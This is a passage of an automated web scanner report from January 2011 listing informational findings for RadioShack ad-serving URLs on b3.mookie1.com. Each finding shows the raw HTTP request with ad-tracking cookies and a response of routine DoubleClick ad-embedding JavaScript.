document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1202403029/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1202403029?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1202403029?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.124. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263253

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:15:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1819507567?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1819507567?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=87754313=_4d436a3c,1376353412,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=87754313/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1819507567?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1819507567?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.125. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:19:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=670623313?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=670623313?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=670623313?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=670623313?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.126. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/732672369/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=732672369?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/732672369/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=732672369?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/732672369/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=732672369?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=732672369?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.127. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296266789

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3174
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/22038498/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=22038498?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/22038498/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=22038498?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/22038498/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=22038498?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=22038498?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.128. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270288

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:09:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2119796835/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2119796835?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2119796835/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2119796835?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2119796835/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=2119796835?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=2119796835?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.129. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; session=1296256112|1296266487

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1681620464/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1681620464?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1681620464/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1681620464?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1681620464/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1681620464?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1681620464?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.130. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
